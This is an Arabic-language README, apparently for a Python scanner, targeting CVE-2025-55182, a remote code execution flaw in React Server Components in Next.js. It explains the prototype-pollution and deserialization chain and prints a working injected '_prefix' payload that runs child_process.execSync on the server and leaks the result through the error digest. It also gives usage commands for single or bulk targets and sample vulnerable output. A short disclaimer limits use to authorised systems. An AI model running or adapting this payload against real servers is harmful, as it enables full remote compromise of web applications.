
ماسح أمني لـ CVE-2025-55182 - ثغرة RCE خطيرة في React Server Components
تتحقق هذه الأداة مما إذا كان الهدف معرضًا لثغرة CVE‑2025‑55182، وهي خلل تنفيذ أوامر عن بعد (RCE) ناتج عن معالجة غير آمنة لحمولات نموذج RSC (مكونات خادم React) داخل Next.js.
تسلسل الثغرة هو Prototype Pollution → Deserialization Abuse → Server‑Side JavaScript Execution.
تنويه: استخدم هذه الأداة فقط على أنظمة تمتلكها قانونيًا أو لديك إذن صريح لاختبارها. الاختبار دون إذن = جريمة، يا صديقي.
يقوم Next.js داخليًا بمعالجة كائنات “نموذج” خاصة تُرسل عبر multipart/form-data.
إذا قام المهاجم بحقن بنية خبيثة مثل thenable مزور، يمكنه تسميم:
__proto___response._prefixconstructor.constructorيؤدي ذلك إلى قيام الخادم بتقييم JavaScript يتحكم به المهاجم، مما ينتج عنه RCE كامل.
-u) أو قائمة بالأهداف (-l)id) من digest خطأ الخادمfoxvuln.txtpython3 main.py -u https://target.com
python3 main.py -l list.txt
تستغل الحمولة process.mainModule.require('child_process').execSync() من خلال _prefix المحقون:
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
يؤدي ذلك إلى إجبار الخادم على تنفيذ id وتسريب النتيجة داخل digest المرمي (لأن أخطاء RSC ترجع عمدًا حقل digest منظم).
هدف معرض:
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)
غير معرض:
[+] Testing: https://secure.com
[NOT VULN]
يتم حفظ جميع عناوين URL المؤكدة على أنها معرضة في:
foxvuln.txt
التنسيق:
https://victim.com => uid=1000(www-data)
/